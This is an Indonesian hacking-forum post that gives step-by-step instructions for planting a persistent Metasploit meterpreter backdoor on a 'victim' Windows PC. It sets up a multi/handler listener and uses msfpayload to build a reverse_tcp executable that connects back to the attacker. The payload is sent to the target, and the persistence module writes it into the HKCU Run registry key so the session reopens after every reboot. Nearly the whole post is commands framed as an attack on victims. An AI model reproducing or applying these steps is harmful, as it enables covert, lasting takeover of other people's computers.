Membuat payload meterpreter permanent
#1
[Image: images?q=tbn:ANd9GcRATzK0Bd0wveLWIueFujS...YHKtTAN5Sg]

langsung saja ya..

buka metasploit kalian disini saya menggunkan backtrack 5 r3

buka terminal ketikkan msfconsole untuk membuka metasploit

[Image: Selection_001.png]


lalu masukkan exploit sebagai berikut


use exploit/multi/handler
set lport 4444
set lhost 192.168.1.73 ( isi dengan ip kalian )
exploit

[Image: Selection_005.png]


setelah itu kita bikin listener dengan meterpreter

buka terminal baru ketikkan perintah

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.73 x > Desktop/4444.exe

disini nama payload saya adalah 4444.exe

[Image: Selection_002.png]


setelah itu kirim payload tersebut ke pc korban atau dengan teknik lain

[Image: Capture.PNG]



setelah korban mengeksekusi file payload tersebut
maka session meterpreter akan terbuka


[Image: Selection_006.png]

setelah itu ketikkan perintah background pada meterpreter untuk memulai aksi mempermnentkan meterpreter


dan kita akan mencari exploit permanentnya dengan mengetik perintah
search persistence


[Image: Selection_007.png]

dan lanjutkan untuk perintah selanjutnya

use post/windows/manage/persistence
set lhost 192.168.1.73
set lport 4444
set rexe /root/Desktop/4444.exe
set rexename xbuster404.exe
set session 1
exploit

dan sukses meterpreter sudah tertanam pada pc korban

[Image: Selection_008.png]


sekarang kita coba test untuk membuktkanya
dengan me-reboot pc korban


[Image: Selection_009.png]


dan pc korban kembali hidup
maka meterpreter session akan terbuka lagi Smile


[Image: Selection_011.png]

[Image: Selection_012.png]

payload tersebut berada pada regedit HKCU > Software > Microsoft > Windows > CurrentVersion > RUN

[Image: Capture.PNG]


selamat berexploitasi


Messages In This Thread
Membuat payload meterpreter permanent - by xbuster404 - 05-15-2013, 10:09 AM




Users browsing this thread: 1 Guest(s)